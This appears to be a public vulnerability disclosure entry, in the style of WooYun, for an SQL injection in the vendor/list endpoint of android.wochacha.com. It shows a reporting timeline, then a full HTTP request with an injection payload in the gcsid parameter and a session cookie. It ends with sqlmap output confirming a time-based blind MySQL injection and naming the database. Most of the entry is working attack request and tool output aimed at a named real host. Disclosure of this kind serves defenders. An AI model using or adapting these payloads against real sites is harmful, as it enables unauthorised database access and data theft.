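2015-11-23: Details reported to the vendor; awaiting vendor response
2015-11-28: The vendor actively ignored the vulnerability; details disclosed to the public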
GET /vendor/list?gcsid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&type=2&vsid=2039367 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://android.wochacha.com:80/
Cookie: GCSID=e78f4fe840fb4d74340fcd378de0f2eb; __utmmobile=0x4201520cd963ca29
Host: android.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://android.wochacha.com:80/vendor/list?gcsid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))sYWl) AND 'hxEi'='hxEi'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&type=2&vsid=2039367
---
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
current database: 'security'
Severity: No impact, ignored by vendor
Ignored at: 2015-11-28 15:08
Vulnerability Rank: 4 (WooYun rating)
None yet